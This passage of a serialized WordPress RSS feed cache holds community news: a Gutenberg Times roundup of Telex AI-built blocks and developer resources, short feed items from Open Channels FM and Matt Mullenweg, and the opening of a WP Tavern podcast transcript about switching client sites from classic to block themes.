blocks!</p>\n\n\n\n<p>Not everyone who&#8217;s tried and shared their journey has hit the jackpot. <strong>Jamie Marsland</strong> totally had a blast, as he shared over on <a href=\"https://x.com/pootlepress/status/1965372076765970943\">X (formerly Twitter)</a>!</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Jeff Paul </strong>also gave it whirl and shared his experience in <a href=\"https://jeffpaul.com/2025/09/pong-block/\"><strong>Pong Block: A Fun New WordPress Plugin (and a Nod to Telex)</strong></a>. He wrote, &#8220;That simplicity is why I’d recommend Telex to anyone curious about experimenting with block plugin creation. It feels like a fast way to explore an idea and get it live.&#8221; His plugin already <a href=\"https://wordpress.org/plugins/pong-block/\"><strong>landed in the WordPress repository,</strong></a> and you can add some playfulness to your site.</p>\n\n\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>JuanMa Garrido</strong>, developer advocate at Automattic, also took Telex for a spin. You can read about this journey in his post <a href=\"https://juanma.codes/2025/09/19/playing-with-telex-building-a-mermaid-diagram-block-in-just-a-few-prompts/\"><strong>Playing with Telex: Building a Mermaid Diagram Block in Just a Few Prompts.</strong></a> Mermaid Diagrams can be created via Markdown notation and then displayed on the front end. </p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img alt=\"Block editor view of JuanMa\'s Mermaid diagram block, built with Telex. \" class=\"wp-image-41948\" height=\"304\" src=\"https://i0.wp.com/gutenbergtimes.com/wp-content/uploads/2025/09/Screenshot-2025-09-20-at-10.26.22.png?resize=643%2C304&#038;ssl=1\" width=\"643\" /></figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong><a href=\"https://x.com/ivanovic_marco\">Marco Ivanovic</a></strong>, designer at Automattic, built a plugin called <a href=\"https://ivanovicmarko.com/2025/09/17/space-dots/\">Space Dots</a> with Telex. A fun block to display a bunch of moving dots that will react to your mouse movements. </p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img alt=\"\" class=\"wp-image-41977\" height=\"449\" src=\"https://i0.wp.com/gutenbergtimes.com/wp-content/uploads/2025/09/Screenshot-2025-09-20-at-12.44.36-edited.png?resize=449%2C449&#038;ssl=1\" style=\"width: 449px; height: auto;\" width=\"449\" /></figure>\n\n\n\n<p><strong>Nick Hamze</strong> shared his Telex creations on X (formerly known as Twitter), like this <a href=\"https://x.com/sortaiconick/status/1968135209519550656\"><strong>flash card block</strong></a>. He also promised to submit his best 10 creations to the WordPress repository. </p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https://x.com/sortaiconick/status/1968135209519550656\"><img alt=\"\" class=\"wp-image-41978\" height=\"416\" src=\"https://i0.wp.com/gutenbergtimes.com/wp-content/uploads/2025/09/Screenshot-2025-09-20-at-12.54.23.png?resize=652%2C416&#038;ssl=1\" width=\"652\" /></a></figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>Are you ready to try it too? In his post on <em>wp-content.co,</em> <a href=\"https://wp-content.co/automattic-telex-ai-tool-turns-prompts-to-blocks/\"><strong>Automattic Launches Telex: An AI Tool That Turns Prompts into Custom WordPress Blocks,</strong></a> <a href=\"https://x.com/nithin_sreeraj\"><strong>Nithin Sreeraj</strong> </a>shares some more voices around the community and then walks you through what to expect when engaging with the AI interface and what happens when the first version is available in the Playground-based interface. It&#8217;s well described. </p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"2-word-press-6-0-1-and-6-1-scheduled\">Theme Development for Full Site Editing and Blocks</h2>\n\n\n\n<p><strong>Mary Ann Aschenbrenner,</strong> <a href=\"https://us.wordcamp.org/2025/session/moving-a-website-from-classic-to-a-block-theme/\">first-time speaker</a> at WCUS 2025, was interviewed by <strong>Nathan Wrigley</strong> for the WPTavern podcast. <a href=\"https://wptavern.com/podcast/185-mary-ann-aschenbrenner-on-switching-clients-from-classic-to-block-themes\" rel=\"noreferrer noopener\" target=\"_blank\"><strong>#185 – Mary Ann Aschenbrenner on Switching Clients From Classic to Block Themes</strong></a>. They discussed the differences between classic and block themes, with Mary Ann offering practical advice for switching to modern block-based themes. She shared why to make the switch, potential challenges, and client conversion stories. Perfect for anyone wanting to understand how block themes make site building more accessible.</p>\n\n\n<div class=\"wp-block-newsletterglue-showhide ng-block\" width=\"100%\">\n<figure class=\"wp-block-embed is-type-rich is-provider-pocket-casts wp-block-embed-pocket-casts\"><div class=\"wp-block-embed__wrapper\">\n\n</div></figure>\n</div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n<section class=\"wp-block-newsletterglue-callout undefined not-color-set\" style=\"border-color: #f9f9e5; border-radius: 22px; border-style: solid; border-width: 0; padding-top: 20px; padding-bottom: 20px; padding-left: 20px; padding-right: 20px; text-align: left; margin-left: 0; margin-right: 0; margin-top: 0px; margin-bottom: 0px; background-color: #f9f9e5;\">\n<p><strong> <a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/\" rel=\"noreferrer noopener\" target=\"_blank\">&#8220;Keeping up with Gutenberg &#8211; Index 2025&#8221;</a> </strong><br />A chronological list of the WordPress Make Blog posts from various teams involved in Gutenberg development: Design, Theme Review Team, Core Editor, Core JS, Core CSS, Test, and Meta team from Jan. 2024 on. Updated by yours truly. The previous years are also available: <strong><strong><a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/keeping-up-with-gutenberg-index-2020/\">2020</a> | <a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/keeping-up-with-gutenberg-index-2021/\">2021</a></strong> | <strong><a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/keeping-up-with-gutenberg-index-2022/\">2022</a></strong></strong> | <strong><a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/gutenberg-index-2023\">2023</a></strong> | <a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/gutenberg-index-2024/\"><strong>2024</strong></a></p>\n</section>\n\n\n<h2 class=\"wp-block-heading\" id=\"3-building-themes-for-fse-and-word-press\">Building Blocks and Tools for the Block editor.</h2>\n\n\n\n<p><br /><strong>Ryan Welcher </strong>has been on the quest to build the Core Icon block, inspired by Nick Diego&#8217;s Icon Block plugin and has been livestreaming his adventures with all kinds of tribulations. He dedicated two live stream sessions to this task. </p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https://www.youtube.com/watch?v=voZwxC6uD3s\"><strong>Building the new Icon Block for WordPress core</strong></a></li>\n\n\n\n<li><a href=\"https://www.youtube.com/watch?v=ogHfLLsbeYk\"><strong>Building the new Icon Block for WordPress core: Part 2</strong></a></li>\n</ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Brian Coords</strong>, developer advocate with WooCommerce, asked, <a href=\"https://www.briancoords.com/are-you-down-with-mcp/\"><strong>Are you down with MCP?</strong></a> because he initially didn&#8217;t get the hype—why waste AI tokens on simple tasks you could do faster manually? But after building a custom WordPress plugin for his wife&#8217;s bakery to track ingredient costs, he realized MCP&#8217;s power isn&#8217;t just data connection; it&#8217;s combining that with AI&#8217;s natural language interface to replace clunky forms with conversational commands. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>This week, <strong>JuanMa Garrido</strong> tackled in his livestream <a href=\"https://www.youtube.com/watch?v=ip8cISDQaYQ\"><strong>REST API Authentication</strong></a>. Together with ChatGPT, he took a deep dive into WordPress REST API authentication methods, starting with the basics of how REST APIs work and setting up WordPress with proper permalinks. Then Garrido walked through WordPress&#8217;s core authentication systems, showing how cookie authentication works in the block editor by examining network requests and cookie headers. He explained WordPress&#8217;s built-in CSRF protection using nonces and demonstrated creating custom REST endpoints with permission callbacks. The tutorial also covers application passwords as an alternative to cookies, comparing them to JSON Web Tokens and discussing security considerations for token storage. Finally, Garrido explored more advanced topics like implementing JWT workflows with proxy servers and OAuth2 authentication for third-party apps.</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p class=\"has-text-align-center has-small-font-size\"><em>Questions? Suggestions? Ideas? </em><br /><em>Don&#8217;t hesitate to send <a href=\"mailto:pauli@gutenbergtimes.com\">them via email</a> or</em><br /><em> send me a message on WordPress Slack or Twitter @bph</em>.</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<p class=\"has-text-align-center has-small-font-size\">For questions to be answered on the <a href=\"http://gutenbergtimes.com/podcast\">Gutenberg Changelog</a>, <br />send them to <a href=\"mailto:changelog@gutenbergtimes.com\">changelog@gutenbergtimes.com</a></p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n<section class=\"wp-block-newsletterglue-group\" style=\"padding-top: 10px; padding-bottom: 10px; padding-left: 20px; padding-right: 20px; margin-top: 0px; margin-bottom: 0px;\">\n<p>Featured Image: Oktoberfest Munich photo by Birgit Pauli-Haack</p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity is-style-wide\" />\n\n\n\n<p class=\"has-text-align-left\"><strong>Don&#8217;t want to miss the next Weekend Edition? </strong></p>\n\n\n<form action=\"https://gutenbergtimes.com/feed/\" autocomplete=\"on\" class=\"wp-block-newsletterglue-form ngl-form ngl-portrait\" method=\"post\"><div class=\"ngl-form-container\"><div class=\"ngl-form-field\" style=\"margin-bottom: 25px;\"><label class=\"ngl-form-label\" for=\"ngl_email\"><br />Type in your Email address to subscribe.</label><div class=\"ngl-form-input\"><input autocomplete=\"email\" class=\"ngl-form-input-text\" id=\"ngl_email\" name=\"ngl_email\" required=\"required\" style=\"border-radius: 21px;\" type=\"email\" /></div></div><button class=\"ngl-form-button\" style=\"background-color: #005075; border-color: #005075; border-width: 1px; border-style: solid; color: #ffffff; border-radius: 21px;\" type=\"submit\">Subscribe</button><p class=\"ngl-form-text\">We hate spam, too, and won&#8217;t give your email address to anyone <br />except Mailchimp to send out our Weekend Edition</p></div><div class=\"ngl-message-overlay\"><div class=\"ngl-message-svg-wrap\"><svg fill=\"none\" height=\"24\" stroke=\"#fff\" stroke-width=\"2\" viewBox=\"0 0 24 24\" width=\"24\" xmlns=\"http://www.w3.org/2000/svg\"><polyline points=\"20 6 9 17 4 12\"></polyline></svg></div><div class=\"ngl-message-overlay-text\">Thanks for subscribing.</div></div><input id=\"ngl_list_id\" name=\"ngl_list_id\" type=\"hidden\" value=\"26f81bd8ae\" /><input id=\"ngl_double_optin\" name=\"ngl_double_optin\" type=\"hidden\" value=\"yes\" /></form>\n\n\n<hr class=\"wp-block-separator has-css-opacity is-style-wide\" />\n</section>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 19 Sep 2025 23:40:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Birgit Pauli-Haack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"Open Channels FM: Agentic AI: The Next Evolution for WordPress Websites?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://openchannels.fm/?p=109354\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"https://openchannels.fm/agentic-ai-the-next-evolution-for-wordpress-websites/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:193:\"In 2025, agentic AI revolutionizes WordPress, enabling context-aware automation and seamless integration across tools, enhancing workflows and empowering users without deep technical knowledge.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 19 Sep 2025 08:58:04 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"Open Channels FM: Best Practices for Asynchronous Communication in Remote Teams\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://openchannels.fm/?p=109619\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"https://openchannels.fm/best-practices-for-asynchronous-communication-in-remote-teams/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:104:\"Asynchronous communication. Over-communicate, use emojis cautiously, and know when to talk face-to-face.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 18 Sep 2025 12:10:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"Matt: Every 6 Minutes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"https://ma.tt/?p=149834\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:38:\"https://ma.tt/2025/09/every-6-minutes/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1550:\"<p>I&#8217;m at a dinner tonight and they have these old magazines on the table, including some old copies of <a href=\"https://www.wired.com/\">WIRED</a>, which, if you can imagine, as a kid in Houston in the 90s, was a portal to the amazing world of the internet and technology. I flipped through, and there is an entire web hosting classifieds section! Hiway Technologies wants you to know that every 6 minutes, someone hosts with Hiway.</p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img alt=\"\" class=\"wp-image-149835\" height=\"805\" src=\"https://i0.wp.com/ma.tt/files/2025/09/IMG_4771-768x1024.jpeg?resize=604%2C805&#038;quality=89&#038;ssl=1\" width=\"604\" /></figure>\n\n\n\n<p>Every six minutes, so they were doing 240 signups a day. 100,000 sites! Last month <a href=\"https://wordpress.com/\">WordPress.com</a> created a new site about every 3 seconds. Hiway was founded by Scott Adams, same name but not the <a href=\"https://dilbert.com/\">Dilbert</a> guy or the <a href=\"https://en.wikipedia.org/wiki/Scott_Adams_(game_designer)\">game designer</a>, who apparently played football in Florida and the company &#8220;<a href=\"https://www.fau.edu/research/magazine/2018/01/dor-adams-2018-01/\">was sold in 1999 for $352 million. Adams was 35.</a>&#8221; </p>\n\n\n\n<p>There was also this guy, who has a website, but do you?</p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img alt=\"\" class=\"wp-image-149838\" height=\"805\" src=\"https://i0.wp.com/ma.tt/files/2025/09/IMG_4767-768x1024.jpeg?resize=604%2C805&#038;quality=89&#038;ssl=1\" width=\"604\" /></figure>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 18 Sep 2025 06:57:40 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:91:\"WPTavern: #185 – Mary Ann Aschenbrenner on Switching Clients From Classic to Block Themes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"https://wptavern.com/?post_type=podcast&p=199566\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:105:\"https://wptavern.com/podcast/185-mary-ann-aschenbrenner-on-switching-clients-from-classic-to-block-themes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:45586:\"<details>Transcript<div>\n<p>[00:00:19] <strong>Nathan Wrigley:</strong> Welcome to the Jukebox podcast from WP Tavern. My name is Nathan Wrigley.</p>\n\n\n\n<p>Jukebox is a podcast which is dedicated to all things WordPress. The people, the events, the plugins, the blocks, the themes, and in this case, switching clients from classic to block themes.</p>\n\n\n\n<p>If you&#8217;d like to subscribe to the podcast, you can do that by searching for WP Tavern in your podcast, player of choice. Or by going to wptavern.com/feed/podcast, and you can copy that URL into most podcast players.</p>\n\n\n\n<p>If you have a topic that you&#8217;d like us to feature on the podcast, I&#8217;m keen to hear from you and hopefully get you, or your idea, featured on the show. Head to wptavern.com/contact/jukebox, and use the form there.</p>\n\n\n\n<p>So on the podcast today we have Mary Ann Aschenbrenner. Mary Ann has been the president of Waterlink Web, a digital agency specializing in WordPress web design, since 2014. Her experience includes e-commerce and membership websites, websites for local nonprofit organizations, and starter websites for small businesses As a lifelong learner, Mary Ann likes to keep pace with the latest innovations in WordPress. She is a fan of block themes, and particularly the WordPress default themes.</p>\n\n\n\n<p>We start by discussing the differences between classic and block themes, with Mary Ann offering practical step-by-step advice for anyone considering a move from a classic theme to a modern block-based theme. She talks about why you might want to make the switch, potential challenges to look out for, and stories from her own experience converting client sites.</p>\n\n\n\n<p>We also chat about the evolution of WordPress, the diminishing need for third party page builders, the importance of client education, and the ongoing improvements in the block editor. Plus Mary Ann shares insights from her WordCamp presentation, and her experiences collaborating with the WordPress community.</p>\n\n\n\n<p>Whether you&#8217;re a seasoned WordPresser or just starting out and keen to know how block themes are making site building more accessible for everyone, this episode is for you.</p>\n\n\n\n<p>If you&#8217;re interested in finding out more, you can find all of the links in the show notes by heading to wptavern.com/podcast, where you&#8217;ll find all the other episodes as well.</p>\n\n\n\n<p>And so without further delay, I bring you Mary Ann Aschenbrenner.</p>\n\n\n\n<p>I am joined on the podcast by Mary Ann Aschenbrenner. Hello.</p>\n\n\n\n<p>[00:02:54] <strong>Mary Ann Aschenbrenner:</strong> Hello. Nice to be here.</p>\n\n\n\n<p>[00:02:56] <strong>Nathan Wrigley:</strong> Very nice to have you with us. Thank you so much. You are the first interview that I&#8217;m carrying out at WordCamp US in Portland in the year 2025.</p>\n\n\n\n<p>The endeavour here is to talk about classic themes and block themes. You are doing a presentation. I don&#8217;t suppose you&#8217;ve done it yet, because we&#8217;re right at the beginning of the main conference.</p>\n\n\n\n<p>[00:03:12] <strong>Mary Ann Aschenbrenner:</strong> I do it this afternoon at 2:15pm, yes.</p>\n\n\n\n<p>[00:03:15] <strong>Nathan Wrigley:</strong> Okay. Good luck with that. Let&#8217;s just first of all find out a little bit about you. So if you don&#8217;t mind, would you just give us your biography, your potted biography, if you like. Who you are, what you do.</p>\n\n\n\n<p>[00:03:24] <strong>Mary Ann Aschenbrenner:</strong> I&#8217;m from Portland, born and raised here. And the reason I got into website design is kind of a fluke and kind of really related to my whole ethos as a citizen of this great city.</p>\n\n\n\n<p>Well, Pier Park is a North Portland park and it&#8217;s where my kids learned to swim. It&#8217;s where a lot of kids learned to swim. It was in a fairly low income neighborhood. And in 2005, the City of Portland decided to close the outdoor pool that was open in the summers. Just funding issues. And I worked with some other North Portland people and we gathered 700 signatures, which I don&#8217;t know if you know this, it&#8217;s a lot of work to get 700 signatures. And we took them down to City Hall, and we presented them and we talked about why Pier Pool needed to stay open.</p>\n\n\n\n<p>And Sam Adams at the time said, we can find money for these folks. He was on the city council. And lo and behold, they decided to keep Pier Pool open.</p>\n\n\n\n<p>Well, about a month later, I&#8217;m at a City Bureau meeting and was told that the reason they decided to close Pier Pool at the time, instead of Buckman Pool was because Buckman had a website. This was 2000 and five. I was like, oh, it can&#8217;t be that hard to get a website. I&#8217;ve collected 700 signatures, websites have to be easier. So Friends of Pier Park has had a website ever since and we, of course, keep our pool open with it. And that&#8217;s the long story short of how I got into it.</p>\n\n\n\n<p>[00:04:58] <strong>Nathan Wrigley:</strong> That&#8217;s nice. That&#8217;s a real sort of philanthropic community endeavour that got you started on the road to WordPress. I&#8217;m guessing you built that site with WordPress.</p>\n\n\n\n<p>[00:05:05] <strong>Mary Ann Aschenbrenner:</strong> I got someone else to do it because I knew nothing about building websites. In 2012, I had the opportunity to go back to school, and I actually went to PCC and studied web design. And I&#8217;ve been building websites, I started my own company shortly after that, and I&#8217;ve been doing it ever since with Water Link Web.</p>\n\n\n\n<p>[00:05:21] <strong>Nathan Wrigley:</strong> Yeah, you&#8217;ve been in the weeds for a fairly long time.</p>\n\n\n\n<p>[00:05:24] <strong>Mary Ann Aschenbrenner:</strong> Yeah, well over a decade. 14 years or something like that.</p>\n\n\n\n<p>[00:05:27] <strong>Nathan Wrigley:</strong> You&#8217;re obviously keeping up to date with all the different bits and pieces in the WordPress space, because the content of your presentation later today is, well, the title is Moving a Website from Classic to Block themes. Some examples, some live and learns. And so I&#8217;m guessing you&#8217;re going to be instructing people on, if they wish to make the move, how to go from what we call a classic theme.</p>\n\n\n\n<p>[00:05:45] <strong>Mary Ann Aschenbrenner:</strong> It will be like the real step by step. This is what you do this first, you do this second, this is what it&#8217;s going to look like, these are the problems you may come into, and this is how to fix them. And voila, it&#8217;s going to be great.</p>\n\n\n\n<p>[00:05:58] <strong>Nathan Wrigley:</strong> And so from your perspective, what&#8217;s the sort of, the single, well, maybe not single, maybe there&#8217;s a few things that you can mention, what are the most compelling reasons that you would ever want to move away from a classic theme?</p>\n\n\n\n<p>Let&#8217;s say that I&#8217;ve got a website, it&#8217;s working perfectly fine. There&#8217;s nothing wrong with it, but I&#8217;m kind of curious. I want to explore the option. What are the big ticket items why you would wish to move?</p>\n\n\n\n<p>[00:06:19] <strong>Mary Ann Aschenbrenner:</strong> Well, a couple of reasons. Often the plugins that might be associated with your old theme may no longer being maintained. So there&#8217;s one situation where I mentioned in the presentation, they&#8217;re not being maintained, you won&#8217;t be able to update the PHP on your server and you could have a site that&#8217;s open to hacking and be slower therefore, because it&#8217;s running on a lower grade PHP.</p>\n\n\n\n<p>So that&#8217;s one reason to do it. Another is once you start using the block theme editor, you don&#8217;t want to go back. And so, you know, I&#8217;ve always maintained my skills with WordPress. I&#8217;ve been active in the WordPress community. I&#8217;ve continued to learn. And, yes, I&#8217;ll admit when the block editor first came out, I was a little trepidatious. I didn&#8217;t use it that first year. But the second year I did, and the third year I did. And I have been using the latest theme every year, ever since when I build my client&#8217;s websites.</p>\n\n\n\n<p>So I just don&#8217;t like going back to the classic and then like, okay, how do we do this? It just isn&#8217;t as intuitive. And as well, it&#8217;s easy to maintain, you don&#8217;t have as much opportunity to make changes as you do in the new block editor. So I&#8217;m just gradually updating my clients.</p>\n\n\n\n<p>[00:07:33] <strong>Nathan Wrigley:</strong> Do you have a background in code or are you more of a kind of mouse driven builder?</p>\n\n\n\n<p>[00:07:38] <strong>Mary Ann Aschenbrenner:</strong> Do I have a background in code? I did a little HTML. I understand CSS and I certainly use that a lot with the classic theme, CSS especially. But that isn&#8217;t really where I trained in.</p>\n\n\n\n<p>Really where my skill lies is working with my clients and creating a website that is unique to them. Every website I do is original. And I look at what colours they want, what values they want to display. And we design based on that.</p>\n\n\n\n<p>And my clients love me. I mean, I&#8217;ve had clients over a decade. Still same clients, still working with me. And they trust me and I know it&#8217;s like, it&#8217;s time to upgrade your website and then we do that.</p>\n\n\n\n<p>[00:08:20] <strong>Nathan Wrigley:</strong> I think one of the things about the classic themes was that having a deep knowledge of the code and the templating hierarchy in WordPress and those kind of things meant that it was available to some, but not necessarily to everybody.</p>\n\n\n\n<p>Whereas the block based themes, the more modern WordPress, if you like, there is much more opportunity to get into the weeds. To do your templates and template parts and things like that with a visual editor.</p>\n\n\n\n<p>So long as you can understand the UI, and where to find the menus, and where to construct the different parts of your website. And that promise of democratising publishing seems to be something that is being delivered, despite the fact that, you know, it&#8217;s a bit of a jump to go from classic to full site.</p>\n\n\n\n<p>[00:08:58] <strong>Mary Ann Aschenbrenner:</strong> It is, absolutely. My daughter&#8217;s wedding photographer contacted me. She&#8217;d had a website on Squarespace, and she found out after 10 years of working as a wedding photographer in southern Oregon, she was only on page five of search results. And that&#8217;s ridiculous, but it&#8217;s because of where she had her website.</p>\n\n\n\n<p>So she switched it over to WordPress and was confused, what do I do next? She had bought a photographer theme, and so it was going to work perfect for her. And I said, you know what? You see those three lines at the top of the page when you go to edit the page, hit them. And she did.</p>\n\n\n\n<p>And then it was like, oh, the light went on. So she&#8217;s going to contact me again when she&#8217;s got that built out. But now she understands what to do. All she needed to learn was those three lines because then she knows she can edit every single block in there, and knows what to do.</p>\n\n\n\n<p>[00:09:49] <strong>Nathan Wrigley:</strong> If you were to look at the growth of WordPress over the last, I&#8217;m going to say sort of 10 years, something like that, the uptick in WordPress usage up to kind of 40 plus percent, whatever it is now, I think there&#8217;s been a lot of page builders responsible for that uptick. So for example, the likes of Elementor or what have you.</p>\n\n\n\n<p>And it was curious that in the blurb that went with your presentation, you particularly pointed out, I think the quote was, no page builder is needed, or something that. Is that a big part of it for you, that you don&#8217;t need to rely on any third party tool, often which have a fee attached to them for an annual or a recurring license or something like that? 